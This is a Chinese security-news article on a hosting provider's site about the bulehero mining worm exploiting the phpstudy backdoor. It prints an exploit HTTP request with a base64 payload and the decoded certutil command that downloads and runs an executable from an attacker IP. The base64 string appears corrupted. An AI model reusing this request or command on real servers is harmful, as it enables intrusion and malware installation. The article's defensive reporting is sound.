【內(nèi)容聲明】本文源于互聯(lián)網(wǎng)收集整理，不代表YINGSOO觀點！若有咨詢“phpstudy存后門漏洞，可使用升級的bulehero挖礦蠕蟲入侵服務(wù)器植入惡意挖礦程序”等有關(guān)服務(wù)器、云主機租用、托管、配置、價格問題，請免費咨詢YINGSOO客服，為您答疑解惑！

　　【海外主機】臺灣600M服務(wù)器特價 | 韓國云服務(wù)器特價 | 印度尼西亞云服務(wù)器特價

　　【推薦閱讀】如何選擇海外云主機？看完這7條你就會選了

　　近日，有國內(nèi)安全團隊監(jiān)控到bulehero挖礦蠕蟲進行了版本升級，蠕蟲升級后開始利用最新出現(xiàn)的pHpstudy后門漏洞作為新的攻擊方式對windows系統(tǒng)的服務(wù)器進行攻擊，入侵成功后會下載門羅幣挖礦程序進行牟利。該挖礦程序會大肆搶占服務(wù)器cpU資源進行門羅幣的挖掘，造成服務(wù)器卡頓，嚴重影響正常業(yè)務(wù)運行，甚至造成業(yè)務(wù)終端。關(guān)于該蠕蟲最早曝光于209年7月，蠕蟲自出現(xiàn)后頻繁更新，陸續(xù)加入多達數(shù)十種的的攻擊方式，可以預(yù)計該黑客團伙將會不斷的尋找新的攻擊方式來植入其惡意程序。

　　phpstudy是國內(nèi)的一款免費的pHp調(diào)試環(huán)境的程序集成包，在國內(nèi)有著近百萬的pHp語言學(xué)習(xí)者和開發(fā)者用戶。在2019年9月20日，網(wǎng)上爆出phpstudy存在“后門”：黑客早在2016年就編寫了“后門”文件，并非法侵入了phpstudy的官網(wǎng)，篡改了軟件安裝包植入“后門”。該“后門”具有遠程控制計算機的功能，可以遠程控制下載運行腳本實現(xiàn)用戶個人信息收集。據(jù)報道黑客利用該漏洞共非法控制計算機67萬余臺，非法獲取大量賬號密碼類、聊天數(shù)據(jù)類、設(shè)備碼類等數(shù)據(jù)10萬余組。該“后門”除了會造成挖礦和信息泄露，還有可能被勒索病毒利用，服務(wù)器關(guān)鍵數(shù)據(jù)被勒索病毒加密后將無法找回，給被害者造成大量的數(shù)據(jù)、經(jīng)濟損失。

　　攻擊者會向被攻擊的服務(wù)器發(fā)送一個利用漏洞的Http get請求，惡意代碼存在于請求頭的Accept-charset字段，字段內(nèi)容經(jīng)過base64編碼。解碼后可以發(fā)現(xiàn)這是一段windows命令：利用certutil.exe工具下載download.exe

　　get/index.phpHttp/1.1connection:Keep-AliveAccept:*/*Accept-charset:c3lzdgVtKcdjZXJ0dXRpbc5legUgLXVybgnhY2hlic1zcgxpdcAtZibodHRwoi8vnjAumtY0Lji1mc4xnzA6mzg4oc9kb3dubg9hZc5legUgJVn5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3agZxmtm5otAuZXhlicYgJVn5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3agZxmtm5otAuZXhlJyk7ZwnobybtZdUoJ3bocHn0dwR5Jyk7Accept-encoding:gzip,deflateAccept-Language:zh-cnReferer:http://xxx:80/index.phpUser-Agent:mozilla/4.0(compatible;msie9.0;windowsnt6.1)Host:xxx

　　解碼后內(nèi)容：

　　system('certutil.exe-urlcache-split-fhttp://60.164.250.170:3888/download.exe%systemRoot%/temp/gbnnnmywkvgwhfq13990.exe&%systemRoot%/temp/gbnnnmywkvgwhfq13990.exe');echomd5('phpstudy');

　　被感染的服務(wù)器會通過download.exe下載器下載名為scarupnpLogon.exe的文件。該文件會釋放多個打包的惡意文件，這些惡意文件可分為三個模塊：挖礦模塊、掃描模塊、攻擊模塊。

　　針對此后門漏洞，服務(wù)器用戶需要對涉及的漏洞及時修復(fù)，否則容易成為挖礦木馬的受害者。

　　建議使用高性能的防火墻產(chǎn)品，其阻斷惡意外聯(lián)、能夠配置智能策略的功能，能夠有效幫助防御入侵。哪怕攻擊者在主機上的隱藏手段再高明，下載、挖礦、反彈shell這些操作，都需要進行惡意外聯(lián)；防火墻的攔截將徹底阻斷攻擊鏈。此外，用戶還可以通過自定義策略，直接屏蔽惡意網(wǎng)站，達到阻斷入侵的目的。

　　優(yōu)惠產(chǎn)品：美國服務(wù)器租用去首頁參與活動！YINGSOO推出PHA挖礦服務(wù)器、PHA挖礦教程、Chia奇亞服務(wù)器、Swarm物理節(jié)點服務(wù)器、Swarm母雞服務(wù)器、Swarm云節(jié)點服務(wù)器、《Phala PHA挖礦資料大全》、《swarm bzz挖礦資料大全》,Swarm Bee節(jié)點租用請咨詢YINGSOO客服！

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。